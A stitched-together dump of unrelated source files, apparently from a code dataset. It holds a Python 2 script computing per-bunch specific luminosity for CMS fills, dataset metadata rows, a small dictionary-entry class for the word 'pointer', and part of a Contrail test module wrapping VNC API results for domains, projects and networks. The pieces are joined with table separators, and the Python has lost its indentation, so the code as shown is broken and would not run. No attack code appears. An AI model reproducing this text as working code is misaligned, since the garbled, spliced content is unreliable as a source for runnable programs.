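# protons (intensity errors 0), the specific lumi is
#   2.0e2 / (1.0e11 * 1.2e11) ~= 1.67e-20
# and the relative error reduces to lumierr/lumi because the intensity terms vanish.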
def getFillFromFile(fillnum,inputdir):
'''
parse fill_xxx.txt files in the input directory for runs, starttime in the fill
input: fillnumber, input dir
output: {run:tarttime}
'''
runtimesInFill={}
#look for files 'fill_num.txt' in inputdir
for filename in os.listdir(inputdir):
mpat=r'^fill_[0-9]{4}.txt$'
m=re.compile(mpat)
if m.match(filename) is None:
continue
filename=filename.strip()
if filename.find('.')==-1: continue
basename,extension=filename.split('.')
if not extension or extension!='txt':
continue
if basename.find('_')==-1: continue
prefix,number=basename.split('_')
if not number : continue
if fillnum!=int(number):continue
f=open(os.path.join(inputdir,'fill_'+number+'.txt'),'r')
for line in f:
l=line.strip()
fields=l.split(',')
if len(fields)<2 : continue
runtimesInFill[int(fields[0])]=fields[1]
f.close()
return runtimesInFill
#####output methods####
def filltofiles(allfills,runsperfill,runtimes,dirname):
'''
write runnumber:starttime map per fill to files
'''
f=open(os.path.join(dirname,allfillname),'w')
for fill in allfills:
print >>f,'%d'%(fill)
f.close()
for fill,runs in runsperfill.items():
filename='fill_'+str(fill)+'.txt'
if len(runs)!=0:
f=open(os.path.join(dirname,filename),'w')
for run in runs:
print >>f,'%d,%s'%(run,runtimes[run])
f.close()
def specificlumiTofile(fillnum,filldata,outdir):
#
#input : fillnum
# filldata: {bxidx:[[lstime,beamstatusfrac,lumivalue,lumierror,speclumi,speclumierr]],[]}
#sorted by bxidx, sorted by lstime inside list
#check outdir/fillnum subdir exists; if not, create it; else outdir=outdir/fillnum
#
if not filldata:
print 'empty input data, do nothing for fill ',fillnum
return
timedict={}#{lstime:[[stablebeamfrac,lumi,lumierr,speclumi,speclumierr]]}
filloutdir=os.path.join(outdir,str(fillnum))
if not os.path.exists(filloutdir):
os.mkdir(filloutdir)
for cmsbxidx,perbxdata in filldata.items():
lhcbucket=0
if cmsbxidx!=0:
lhcbucket=(cmsbxidx-1)*10+1
a=sorted(perbxdata,key=lambda x:x[0])
filename=str(fillnum)+'_lumi_'+str(lhcbucket)+'_CMS.txt'
linedata=[]
for perlsdata in a:
ts=int(perlsdata[0])
beamstatusfrac=perlsdata[1]
lumi=perlsdata[2]
lumierror=perlsdata[3]
#beam1intensity=perlsdata[4]
#beam2intensity=perlsdata[5]
speclumi=perlsdata[4]
speclumierror= perlsdata[5]
if lumi>0:
linedata.append([ts,beamstatusfrac,lumi,lumierror,speclumi,speclumierror])
if not timedict.has_key(ts):
timedict[ts]=[]
timedict[ts].append([beamstatusfrac,lumi,lumierror,speclumi,speclumierror])
if len(linedata)>10:#at least 10 good ls
f=open(os.path.join(filloutdir,filename),'w')
for line in linedata:
print >>f, '%d\t%e\t%e\t%e\t%e\t%e'%(line[0],line[1],line[2],line[3],line[4],line[5])
f.close()
#print 'writing avg file'
summaryfilename=str(fillnum)+'_lumi_CMS.txt'
f=None
lstimes=timedict.keys()
lstimes.sort()
fillseg=[]
lscounter=0
for lstime in lstimes:
allvalues=timedict[lstime]
transposedvalues=CommonUtil.transposed(allvalues,0.0)
bstatfrac=transposedvalues[0][0]#beamstatus does not change with bx position
lumivals=transposedvalues[1]
lumitot=sum(lumivals)
if bstatfrac==1.0 :
fillseg.append([lstime,lumitot])
lumierrs=transposedvalues[2]
lumierrortot=math.sqrt(sum(map(lambda x:x**2,lumierrs)))
specificvals=transposedvalues[3]
specificavg=sum(specificvals)/float(len(specificvals))#avg spec lumi
specificerrs=transposedvalues[4]
specifictoterr=math.sqrt(sum(map(lambda x:x**2,specificerrs)))
specificerravg=specifictoterr/float(len(specificvals))
if lscounter==0:
f=open(os.path.join(filloutdir,summaryfilename),'w')
lscounter+=1
print >>f,'%d\t%e\t%e\t%e\t%e\t%e'%(lstime,bstatfrac,lumitot,lumierrortot,specificavg,specificerravg)
if f is not None:
f.close()
#print 'writing summary file'
fillsummaryfilename=str(fillnum)+'_bxsum_CMS.txt'
f=open(os.path.join(filloutdir,fillsummaryfilename),'w')
if len(fillseg)==0:
print >>f,'%s'%('#no stable beams')
f.close()
return
previoustime=fillseg[0][0]
boundarytime=fillseg[0][0]
#print 'boundary time ',boundarytime
summaryls={}
summaryls[boundarytime]=[]
for [lstime,lumitot] in fillseg:#fillseg is everything with stable beam flag
if lstime-previoustime>50.0:
boundarytime=lstime
#print 'found new boundary ',boundarytime
summaryls[boundarytime]=[]
# print 'appending ',boundarytime,lstime,lumitot
summaryls[boundarytime].append([lstime,lumitot])
previoustime=lstime
#print summaryls
summarylstimes=summaryls.keys()
summarylstimes.sort()
lumip=lumiParameters.ParametersObject()
for bts in summarylstimes:
startts=bts
tsdatainseg=summaryls[bts]
#print 'tsdatainseg ',tsdatainseg
stopts=tsdatainseg[-1][0]
plu=max(CommonUtil.transposed(tsdatainseg,0.0)[1])
lui=sum(CommonUtil.transposed(tsdatainseg,0.0)[1])*lumip.lslengthsec()
print >>f,'%d\t%d\t%e\t%e'%(startts,stopts,plu,lui)
f.close()
def getSpecificLumi(schema,fillnum,inputdir,dataidmap,normmap,xingMinLum=0.0,amodetag='PROTPHYS',bxAlgo='OCC1'):
'''
specific lumi in 1e-30 (ub-1s-1) unit
lumidetail occlumi in 1e-27
1309_lumi_401_CMS.txt
time(in seconds since January 1,2011,00:00:00 UTC) stab(fraction of time spent in stable beams for this time bin) l(lumi in Hz/ub) dl(point-to-point error on lumi in Hz/ub) sl(specific lumi in Hz/ub) dsl(error on specific lumi)
20800119.0 1 -0.889948 0.00475996848729 0.249009 0.005583287562 -0.68359 6.24140208607 0.0 0.0 0.0 0.0 0.0 0.0 0.0383576 0.00430892097862 0.0479095 0.00430892097862 66.6447 4.41269758764 0.0 0.0 0.0
result [(time,beamstatusfrac,lumi,lumierror,speclumi,speclumierror)]
'''
t=lumiTime.lumiTime()
fillbypos={}#{bxidx:[[ts,beamstatusfrac,lumi,lumierror,spec1,specerror],[]]}
runtimesInFill=getFillFromDB(schema,fillnum)#{runnum:starttimestr}
runlist=runtimesInFill.keys()
if not runlist: return fillbypos
irunlsdict=dict(zip(runlist,[None]*len(runlist)))
#prirunlsdict
GrunsummaryData=lumiCalcAPI.runsummaryMap(session.nominalSchema(),irunlsdict)
lumidetails=lumiCalcAPI.deliveredLumiForIds(schema,irunlsdict,dataidmap,GrunsummaryData,beamstatusfilter=None,normmap=normmap,withBXInfo=True,bxAlgo=bxAlgo,xingMinLum=xingMinLum,withBeamIntensity=True,lumitype='HF')
#
#output: {run:[lumilsnum(0),cmslsnum(1),timestamp(2),beamstatus(3),beamenergy(4),deliveredlumi(5),calibratedlumierr(6),(bxvalues,bxerrs)(7),(bxidx,b1intensities,b2intensities)(8),fillnum(9)]}
#
totalstablebeamls=0
orderedrunlist=sorted(lumidetails)
for run in orderedrunlist:
perrundata=lumidetails[run]
for perlsdata in perrundata:
beamstatus=perlsdata[3]
if beamstatus=='STABLE BEAMS':
totalstablebeamls+=1
#print 'totalstablebeamls in fill ',totalstablebeamls
    if totalstablebeamls<10:#less than 10 LS in a fill has 'stable beam', it's not a good fill
print 'fill ',fillnum,' , having less than 10 stable beam lS, is not good, skip'
return fillbypos
lumiparam=lumiParameters.ParametersObject()
for run in orderedrunlist:
perrundata=lumidetails[run]
for perlsdata in perrundata:
beamstatusfrac=0.0
tsdatetime=perlsdata[2]
ts=calendar.timegm(tsdatetime.utctimetuple())
beamstatus=perlsdata[3]
if beamstatus=='STABLE BEAMS':
beamstatusfrac=1.0
(bxidxlist,bxvaluelist,bxerrolist)=perlsdata[7]
#instbxvaluelist=[x/lumiparam.lslengthsec() for x in bxvaluelist if x]
instbxvaluelist=[x for x in bxvaluelist if x]
maxlumi=0.0
if len(instbxvaluelist)!=0:
maxlumi=max(instbxvaluelist)
avginstlumi=0.0
if len(instbxvaluelist)!=0:
avginstlumi=sum(instbxvaluelist)
(intbxidxlist,b1intensities,b2intensities)=perlsdata[8]#contains only non-zero bx
for bxidx in bxidxlist:
idx=bxidxlist.index(bxidx)
instbxvalue=bxvaluelist[idx]
bxerror=bxerrolist[idx]
if instbxvalue<max(xingMinLum,maxlumi*0.2):
continue
bintensityPos=-1
try:
bintensityPos=intbxidxlist.index(bxidx)
except ValueError:
pass
if bintensityPos<=0:
fillbypos.setdefault(bxidx,[]).append([ts,beamstatusfrac,instbxvalue,bxerror,0.0,0.0])
continue
b1intensity=b1intensities[bintensityPos]
b2intensity=b2intensities[bintensityPos]
speclumi=calculateSpecificLumi(instbxvalue,bxerror,b1intensity,0.0,b2intensity,0.0)
fillbypos.setdefault(bxidx,[]).append([ts,beamstatusfrac,instbxvalue,bxerror,speclumi[0],speclumi[1]])
return fillbypos
##############################
## ######################## ##
## ## ################## ## ##
## ## ## Main Program ## ## ##
## ## ################## ## ##
## ######################## ##
##############################
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),description = "specific lumi",formatter_class=argparse.ArgumentDefaultsHelpFormatter)
amodetagChoices = [ "PROTPHYS","IONPHYS",'PAPHYS' ]
xingAlgoChoices =[ "OCC1","OCC2","ET"]
# parse arguments
parser.add_argument('-c',dest='connect',
action='store',
required=False,
help='connect string to lumiDB,optional',
default='frontier://LumiCalc/CMS_LUMI_PROD')
parser.add_argument('-P',dest='authpath',
action='store',
help='path to authentication file,optional')
parser.add_argument('-i',dest='inputdir',
action='store',
required=False,
help='output dir',
default='.')
parser.add_argument('-o',dest='outputdir',
action='store',
required=False,
help='output dir',
default='.')
parser.add_argument('-f','--fill',dest='fillnum',
action='store',
required=False,
help='specific fill',
default=None)
parser.add_argument('--minfill',dest='minfill',
type=int,
action='store',
required=False,
default=MINFILL,
help='min fill')
parser.add_argument('--maxfill',dest='maxfill',
type=int,
action='store',
required=False,
default=MAXFILL,
help='maximum fillnumber '
)
parser.add_argument('--amodetag',dest='amodetag',
action='store',
choices=amodetagChoices,
required=False,
                        help='specific accelerator mode choices [PROTPHYS,IONPHYS,PAPHYS] (optional)')
parser.add_argument('--xingMinLum', dest = 'xingMinLum',
type=float,
default=1e-03,
required=False,
help='Minimum luminosity considered for lumibylsXing action')
parser.add_argument('--xingAlgo', dest = 'bxAlgo',
default='OCC1',
required=False,
help='algorithm name for per-bunch lumi ')
parser.add_argument('--normtag',dest='normtag',action='store',
required=False,
help='norm tag',
default=None)
parser.add_argument('--datatag',dest='datatag',action='store',
required=False,
help='data tag',
default=None)
#
#command configuration
#
parser.add_argument('--siteconfpath',dest='siteconfpath',action='store',
help='specific path to site-local-config.xml file, optional. If path undefined, fallback to cern proxy&server')
#
#switches
#
parser.add_argument('--without-correction',dest='withoutNorm',action='store_true',
help='without any correction/calibration' )
parser.add_argument('--debug',dest='debug',action='store_true',
help='debug')
options=parser.parse_args()
if options.authpath:
os.environ['CORAL_AUTH_PATH'] = options.authpath
##
#query DB for all fills and compare with allfills.txt
#if found newer fills, store in mem fill number
#reprocess anyway the last 1 fill in the dir
#redo specific lumi for all marked fills
##
svc=sessionManager.sessionManager(options.connect,authpath=options.authpath,debugON=options.debug)
session=svc.openSession(isReadOnly=True,cpp2sqltype=[('unsigned int','NUMBER(10)'),('unsigned long long','NUMBER(20)')])
fillstoprocess=[]
maxfillnum=options.maxfill
minfillnum=options.minfill
if options.fillnum is not None: #if process a specific single fill
fillstoprocess.append(int(options.fillnum))
else:
session.transaction().start(True)
schema=session.nominalSchema()
allfillsFromDB=lumiCalcAPI.fillInRange(schema,fillmin=minfillnum,fillmax=maxfillnum,amodetag=options.amodetag)
processedfills=listfilldir(options.outputdir)
lastcompletedFill=lastcompleteFill(os.path.join(options.inputdir,'runtofill_dqm.txt'))
for pf in processedfills:
if pf>lastcompletedFill:
print '\tremove unfinished fill from processed list ',pf
processedfills.remove(pf)
for fill in allfillsFromDB:
if fill not in processedfills :
if int(fill)<=lastcompletedFill:
if int(fill)>minfillnum and int(fill)<maxfillnum:
fillstoprocess.append(fill)
else:
print 'ongoing fill...',fill
session.transaction().commit()
print 'fills to process : ',fillstoprocess
if len(fillstoprocess)==0:
print 'no fill to process, exit '
exit(0)
print '===== Start Processing Fills',fillstoprocess
print '====='
filldata={}
#
# check datatag
#
reqfillmin=min(fillstoprocess)
reqfillmax=max(fillstoprocess)
session.transaction().start(True)
runlist=lumiCalcAPI.runList(session.nominalSchema(),options.fillnum,runmin=None,runmax=None,fillmin=reqfillmin,fillmax=reqfillmax,startT=None,stopT=None,l1keyPattern=None,hltkeyPattern=None,amodetag=options.amodetag,nominalEnergy=None,energyFlut=None,requiretrg=False,requirehlt=False)
datatagname=options.datatag
if not datatagname:
(datatagid,datatagname)=revisionDML.currentDataTag(session.nominalSchema())
dataidmap=revisionDML.dataIdsByTagId(session.nominalSchema(),datatagid,runlist=runlist,withcomment=False)
#{run:(lumidataid,trgdataid,hltdataid,())}
else:
dataidmap=revisionDML.dataIdsByTagName(session.nominalSchema(),datatagname,runlist=runlist,withcomment=False)
#
# check normtag and get norm values if required
#
normname='NONE'
normid=0
normvalueDict={}
if not options.withoutNorm:
normname=options.normtag
if not normname:
normmap=normDML.normIdByType(session.nominalSchema(),lumitype='HF',defaultonly=True)
if len(normmap):
normname=normmap.keys()[0]
normid=normmap[normname]
else:
normid=normDML.normIdByName(session.nominalSchema(),normname)
if not normid:
                raise RuntimeError('[ERROR] cannot resolve norm/correction')
normvalueDict=normDML.normValueById(session.nominalSchema(),normid) #{since:[corrector(0),{paramname:paramvalue}(1),amodetag(2),egev(3),comment(4)]}
session.transaction().commit()
for fillnum in fillstoprocess:# process per fill
session.transaction().start(True)
filldata=getSpecificLumi(session.nominalSchema(),fillnum,options.inputdir,dataidmap,normvalueDict,xingMinLum=options.xingMinLum,amodetag=options.amodetag,bxAlgo=options.bxAlgo)
specificlumiTofile(fillnum,filldata,options.outputdir)
session.transaction().commit()
| [
"[email protected]"
]
| |
d5848a9e5ad00752733438c6be9f15f855ff05c2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pointer.py | 5ac88a0ce708e9c89cc7b196e8ef77770aec8498 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 691 | py |
# class header
class _POINTER():
def __init__(self,):
self.name = "POINTER"
self.definitions = [u'something that is used for pointing at things, such as a long, thin stick that you hold to direct attention to a place on a map or words on a board, or a cursor', u'a helpful piece of advice or information: ', u'something that shows you an existing or developing situation: ', u'a hunting dog that has been trained to stand very still with its nose pointing towards the animals and birds that are being hunted']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
07d74c965ad48428b3acade5da4a6aa190bffc77 | 4a307849ed4dded5ce84b0ceb6d2cf56c2e64b89 | /tcutils/config/vnc_api_results.py | 093f370d0de9d0734a131a098e8f33e0287fb00e | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
]
| permissive | lmadhusudhanan/contrail-test | a6316b41dcb836315d25503f1dee511943d7f976 | bd39ff19da06a20bd79af8c25e3cde07375577cf | refs/heads/master | 2022-05-04T20:01:58.960911 | 2018-06-27T17:56:47 | 2018-06-27T17:56:47 | 138,913,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,667 | py | import re
from tcutils.verification_util import *
class CsDomainResult (Result):
'''
CsDomainResult to provide access to vnc_introspect_utils.get_cs_domain
    dict contains:
{u'domain': {
u'fq_name': [u'ted-domain'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13068984139654137108L,
u'uuid_mslong': 9504116366942620127L}},
u'namespaces': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/namespace/c0552b1f-588e-4507-8962-b1837c8f883a',
u'to': [u'ted-domain', u'default-namespace'],
u'uuid': u'c0552b1f-588e-4507-8962-b1837c8f883a'}],
u'projects': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/0d779509-7d54-4842-9b34-f85557898b67',
u'to': [u'ted-domain', u'ted-eng'],
u'uuid': u'0d779509-7d54-4842-9b34-f85557898b67'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain', u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'domain',
u'href': u'http://10.84.7.4:8082/domain/83e5677b-1397-49df-b55e-5bd5234c8514',
u'name': u'ted-domain',
u'uuid': u'83e5677b-1397-49df-b55e-5bd5234c8514'}}
'''
def fq_name(self):
return ':'.join(self.xpath('domain', 'fq_name'))
def name(self):
return self.xpath('domain', 'name')
def uuid(self):
return self.xpath('domain', 'uuid')
def project_list(self):
return map(lambda x: ':'.join(x['to']),
self.xpath('domain', 'projects'))
def project(self, name):
if not self.xpath('domain', 'projects'):
return list()
return filter(lambda x: x['to'] == [self.name(), name],
self.xpath('domain', 'projects'))
def st_list(self):
return self.xpath('domain', 'service_templates')
def st(self, st):
return filter(lambda x: x['to'][-1] == st, self.st_list())
def vdns_list(self):
return self.xpath('domain', 'virtual_DNSs')
def vdns(self, vdns_name):
vdns_li = self.vdns_list()
if vdns_li:
return filter(lambda x: x['to'][-1] == vdns_name, vdns_li)
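# Usage sketch (added commentary, not part of the original module): these Result
# wrappers are normally constructed from the JSON dict returned by the config API,
# typically via vnc_introspect_utils.get_cs_domain(); variable names below are
# illustrative only:
#
#   dom = CsDomainResult(api_response_dict)   # dict shaped like the docstring above
#   dom.fq_name()              # -> 'ted-domain'
#   dom.project('ted-eng')     # -> list of matching project references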
class CsProjectResult (Result):
'''
    CsProjectResult to provide access to vnc_introspect_utils.get_cs_project
    dict contains:
{u'project': {u'fq_name': [u'ted-domain', u'ted-eng'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 11183836820092324711L,
u'uuid_mslong': 970408112711551042}},
u'network_ipams': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}],
u'network_policys': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/network-policy/c30461ae-e72a-44a6-845b-7510c7ae3897',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-policy'],
u'uuid': u'c30461ae-e72a-44a6-845b-7510c7ae3897'}],
u'security_groups': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/security-group/32dc02af-1b3c-4baa-a6eb-3c97cbdd2941',
u'to': [u'ted-domain',
u'ted-eng',
u'default-security-group'],
u'uuid': u'32dc02af-1b3c-4baa-a6eb-3c97cbdd2941'}],
u'service_templates': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/service-template/4264dd1e-d312-4e03-a60e-35b40da39e95',
u'to': [u'ted-domain',
u'ted-eng',
u'default-service-template'],
u'uuid': u'4264dd1e-d312-4e03-a60e-35b40da39e95'}],
u'_type': u'project',
u'virtual_networks': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back'],
u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/926c8dcc-0b8b-444f-9f59-9ab67a8f9f48',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-front'],
u'uuid': u'926c8dcc-0b8b-444f-9f59-9ab67a8f9f48'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/b312647f-0921-4ddf-9d59-0667a887989f',
u'to': [u'ted-domain',
u'ted-eng',
u'default-virtual-network'],
u'uuid': u'b312647f-0921-4ddf-9d59-0667a887989f'}],
u'href': u'http://10.84.7.4:8082/project/0d779509-7d54-4842-9b34-f85557898b67',
u'name': u'ted-eng',
u'parent_name': u'ted-domain',
u'uuid': u'0d779509-7d54-4842-9b34-f85557898b67'}}
'''
def fq_name(self):
return ':'.join(self.xpath('project', 'fq_name'))
def policy_list(self):
return self.xpath('project', 'network_policys')
def policy(self, policy):
return filter(lambda x: x['to'][-1] == policy, self.policy_list())
def vn_list(self):
return self.xpath('project', 'virtual_networks')
def vn(self, vn):
if self.vn_list():
return filter(lambda x: x['to'][-1] == vn, self.vn_list())
return []
def fip_list(self):
if self.has_key('floating_ip_pool_refs'):
p = self.xpath('project', 'floating_ip_pool_refs')
else:
p = []
return p
def fip(self, fip_fq_name=[]):
return filter(lambda x: x['to'] == fip_fq_name, self.fip_list())
def secgrp_list(self):
return self.xpath('project', 'security_groups')
def secgrp(self, secgrp):
secgrp_list = self.secgrp_list()
if secgrp_list:
return filter(lambda x: x['to'][-1] == secgrp, secgrp_list)
def si_list(self):
return self.xpath('project', 'service_instances')
def si(self, si):
si_list = self.si_list()
if si_list:
return filter(lambda x: x['to'][-1] == si, si_list)
def alarm_list(self):
result = self.xpath('project', 'alarms')
if not result:
return []
return result
def alarm(self,alarm):
return filter(lambda x: x['to'][-1] == alarm, self.alarm_list())
class CsAlarmResult(Result):
def fq_name(self):
return ':'.join(self.xpath('alarm','fq_name'))
class CsVdnsResult(Result):
def fq_name(self):
return ':'.join(self.xpath('virtual-DNS', 'fq_name'))
def vdns_data(self):
return ':'.join(self.xpath('virtual-DNS', 'virtual_DNS_data'))
def vdns_records(self):
return ':'.join(self.xpath('virtual-DNS', 'virtual_DNS_records'))
# end of CsVdnsResult
class CsUseFipResult (Result):
'''
CsUseFipResult to provide access to vnc_introspect_utils.get_cs_use_fip_pool
    dict contains:
{u'floating-ip-pool': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'ted-front',
u'ted_fip_pool'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13214437371555268939L,
u'uuid_mslong': 18023639221065174839L}},
u'project_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain',
u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'floating-ip-pool',
u'href': u'http://10.84.7.4:8082/floating-ip-pool/fa20d460-d363-4f37-b763-1cc6be32c94b',
u'name': u'ted_fip_pool',
u'parent_name': u'ted-front',
u'uuid': u'fa20d460-d363-4f37-b763-1cc6be32c94b'}}
'''
class CsAllocFipResult (Result):
'''
CsAllocFipResult to provide access to vnc_introspect_utils.get_cs_alloc_fip_pool
    dict contains:
{u'floating-ip-pool': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'ted-front',
u'ted_fip_pool'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13214437371555268939L,
u'uuid_mslong': 18023639221065174839L}},
u'project_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain',
u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'floating-ip-pool',
u'href': u'http://10.84.7.4:8082/floating-ip-pool/fa20d460-d363-4f37-b763-1cc6be32c94b',
u'name': u'ted_fip_pool',
u'parent_name': u'ted-front',
u'uuid': u'fa20d460-d363-4f37-b763-1cc6be32c94b'}}
'''
pass
class CsIPAMResult (Result):
'''
CsIPAMResult to provide access to vnc_introspect_utils.get_cs_ipam
    dict contains:
{u'network-ipam': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 10454003373031551739L,
u'uuid_mslong': 5922516436339146834}},
u'network_ipam_mgmt': {u'dhcp_option_list': None,
u'ipam_method': u'dhcp'},
u'_type': u'network-ipam',
u'virtual_network_back_refs': [{u'attr': {u'ipam_subnets': [{u'default_gateway': None,
u'subnet': {u'ip_prefix': u'192.168.1.0',
u'ip_prefix_len': 24}}]},
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back'],
u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'}],
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'name': u'default-network-ipam',
u'parent_name': u'ted-eng',
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}}
'''
def fq_name(self):
return ':'.join(self.xpath('network-ipam', 'fq_name'))
class CsPolicyResult (Result):
'''
CsPolicyResult to provide access to vnc_introspect_utils.get_cs_policy
    dict contains:
{u'network-policy': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'default-network-policy'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 9537345350817167511L,
u'uuid_mslong': 14052464141133300902L}},
u'_type': u'network-policy',
u'href': u'http://10.84.7.4:8082/network-policy/c30461ae-e72a-44a6-845b-7510c7ae3897',
u'name': u'default-network-policy',
u'parent_name': u'ted-eng',
u'uuid': u'c30461ae-e72a-44a6-845b-7510c7ae3897'}}
'''
def fq_name(self):
return ':'.join(self.xpath('network-policy', 'fq_name'))
class CsVNResult (Result):
'''
CsVNResult to provide access to vnc_introspect_utils.get_cs_vn
    dict contains:
{u'virtual-network': {u'fq_name': [u'ted-domain', u'ted-eng', u'ted-back'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 10910164567580612540L,
u'uuid_mslong': 7664102000529133546}},
u'instance_ip_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/instance-ip/9d4cbfbc-da80-4732-a98e-77607bd78704',
u'to': [u'9d4cbfbc-da80-4732-a98e-77607bd78704'],
u'uuid': u'9d4cbfbc-da80-4732-a98e-77607bd78704'}],
u'network_ipam_refs': [{u'attr': {u'ipam_subnets': [{u'default_gateway': None,
u'subnet': {u'ip_prefix': u'192.168.1.0',
u'ip_prefix_len': 24}}]},
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}],
u'routing_instances': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/routing-instance/a68948af-46be-4f26-b73e-9ec725f57437',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back',
u'ted-back'],
u'uuid': u'a68948af-46be-4f26-b73e-9ec725f57437'}],
u'_type': u'virtual-network',
u'virtual_machine_interface_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-machine-interface/864ecd37-cf1f-43d5-9f63-4f24831859eb',
u'to': [u'c707f91f-68e9-427a-a0ba-92563c0d067f',
u'864ecd37-cf1f-43d5-9f63-4f24831859eb'],
u'uuid': u'864ecd37-cf1f-43d5-9f63-4f24831859eb'}],
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'name': u'ted-back',
u'parent_name': u'ted-eng',
u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'}}
'''
_pat = None
def _rpat(self):
if self._pat is None:
self._pat = re.compile('-interface/.*$')
return self._pat
def sub(self, st, _id):
return self._rpat().sub('/%s' % _id, st)
def fq_name(self):
return ':'.join(self.xpath('virtual-network', 'fq_name'))
def fip_list(self):
return self.xpath('virtual-network', 'floating_ip_pools')
def fip(self, fip):
return filter(lambda x: x['to'][-1] == fip, self.fip_list())
def vm_link_list(self):
return map(lambda x: self.sub(x['href'], x['to'][0]),
self.xpath('virtual-network',
'virtual_machine_interface_back_refs'))
def rts(self):
if self.xpath('virtual-network').has_key('route_target_list'):
for rt in self.xpath('virtual-network', 'route_target_list',
'route_target'):
yield rt
def ri_links(self):
if self.xpath('virtual-network').has_key('routing_instances'):
for ri in self.xpath('virtual-network', 'routing_instances'):
yield ri['href']
def ri_refs(self):
if self.xpath('virtual-network').has_key('routing_instances'):
for ri in self.xpath('virtual-network', 'routing_instances'):
yield ri['to']
def uuid(self):
return self.xpath('virtual-network', 'uuid')
def route_table(self):
return self.xpath('virtual-network', 'route_table_refs', 0)
@property
